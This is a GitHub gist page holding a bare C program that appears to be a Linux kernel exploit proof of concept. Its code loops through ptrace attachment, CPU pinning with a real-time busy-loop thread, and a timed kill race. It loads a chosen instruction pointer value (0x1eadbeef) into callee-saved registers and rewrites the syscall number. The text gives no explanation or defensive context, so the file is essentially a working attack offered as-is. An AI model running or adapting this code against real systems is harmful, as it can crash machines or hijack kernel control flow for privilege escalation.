Created
September 23, 2013 05:58
-
-
Save flankerhqd/6666892 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <sched.h> | |
| #include <sys/ptrace.h> | |
| #include <sys/user.h> | |
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <assert.h> | |
| #include <signal.h> | |
| /* S */ | |
| int nuke_cpu(void) | |
| { | |
| int pid0; | |
| int i; | |
| unsigned long mask = 1; | |
| pid0 = fork(); | |
| if (!pid0) { | |
| struct sched_param p = {}; | |
| p.sched_priority = sched_get_priority_min(SCHED_FIFO); | |
| assert(!sched_setscheduler(0, SCHED_FIFO, &p)); | |
| assert(!sched_setaffinity(0, sizeof(mask), &mask)); | |
| i = 0; | |
| usleep(120000); | |
| while(1) { | |
| if (i == 50000) { | |
| usleep(10); | |
| printf("x"); | |
| fflush(stdout); | |
| } | |
| i++; | |
| } | |
| } | |
| return pid0; | |
| } | |
| int once() | |
| { | |
| long i; | |
| int pid0; | |
| int pid; | |
| unsigned long mask = 1; | |
| struct user_regs_struct regs; | |
| assert(!sched_setaffinity(0, sizeof(mask), &mask)); | |
| pid = fork(); | |
| if (!pid) { | |
| /* V */ | |
| while (1) { | |
| /* Put our chosen RIP in callee saved registers */ | |
| asm __volatile__ ( | |
| "mov $0x1eadbeef, %%rbx\n" | |
| "mov $0x1eadbeef, %%rbp\n" | |
| "mov $0x1eadbeef, %%r12\n" | |
| "mov $0x1eadbeef, %%r13\n" | |
| "mov $0x1eadbeef, %%r14\n" | |
| "mov $0x1eadbeef, %%r15\n" | |
| "mov $0, %%rsi\n" | |
| "mov $0, %%rdi\n" | |
| "mov $0x6d, %%rax\n" | |
| "syscall":::"rax","rsi","rdi", | |
| "r12", "rbx"); | |
| } | |
| } else { | |
| /* P */ | |
| assert(!ptrace(PTRACE_ATTACH, pid, 0, 0)); | |
| wait(NULL); | |
| assert(!ptrace(PTRACE_SETOPTIONS, pid, NULL, | |
| PTRACE_O_TRACESYSGOOD | | |
| PTRACE_O_TRACEFORK | | |
| PTRACE_O_TRACEVFORK | | |
| PTRACE_O_TRACECLONE)); | |
| while(1) { | |
| int nuke_pid; | |
| int pid2; | |
| mask = 0xfffe; | |
| assert(!sched_setaffinity(0, sizeof(mask), &mask)); | |
| /*Entry */ | |
| assert(!ptrace(PTRACE_SYSCALL, pid, NULL, 0, 0)); | |
| wait(NULL); | |
| assert(!ptrace(PTRACE_GETREGS, pid, NULL, ®s)); | |
| nuke_pid = nuke_cpu(); | |
| regs.orig_rax = 0x3c; | |
| pid2 = fork(); | |
| if (!pid2) { | |
| /* K */ | |
| usleep(120000); | |
| kill(pid, SIGKILL); | |
| printf("."); | |
| fflush(stdout); | |
| exit(0); | |
| } | |
| printf("{"); | |
| fflush(stdout); | |
| if (!ptrace(PTRACE_SETREGS, pid, NULL, ®s)) { | |
| printf("+"); | |
| } else { | |
| printf("-"); | |
| } | |
| ptrace(PTRACE_CONT, pid, NULL, 0, SIGKILL); | |
| kill(pid, SIGKILL); | |
| kill(pid2, SIGKILL); | |
| kill(nuke_pid, SIGKILL); | |
| exit(0); | |
| } | |
| } | |
| } | |
| int main(void) { | |
| while (1) { | |
| int pid = fork(); | |
| if (!pid) { | |
| once(); | |
| } | |
| wait(NULL); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment